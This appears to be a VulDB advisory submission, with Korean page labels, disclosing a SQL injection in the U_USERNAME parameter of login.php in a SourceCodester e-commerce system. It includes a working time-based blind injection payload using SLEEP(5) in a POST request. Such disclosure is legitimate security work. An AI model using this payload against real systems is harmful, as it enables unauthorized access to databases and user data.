| 제목 | E-Commerce System login.php SQL Injection Vulnerability |
|---|
| 설명 | E-Commerce System has a SQL Injection Vulnerability in its common user login function, the vulnerable URI is '/ecommerce/login.php' , and the injectable parameters is U_USERNAME
A time-based blind injection poc is below:
POST /ecommerce/login.php HTTP/1.1
***************************************
proid=1&U_USERNAME=123' AND (SELECT 6283 FROM (SELECT(SLEEP(5)))qFDz) AND 'OWHz'='OWHz&U_PASS=123&modalLogin=
Then the server will response after 5s , which proves the vul |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| 사용자 | WWesleywww (UID 43117) |
|---|
| 제출 | 2023. 03. 20. AM 07:53 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 20. AM 08:33 (39 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223410 [SourceCodester E-Commerce System 1.0 login.php U_USERNAME SQL 주입] |
|---|
| 포인트들 | 20 |
|---|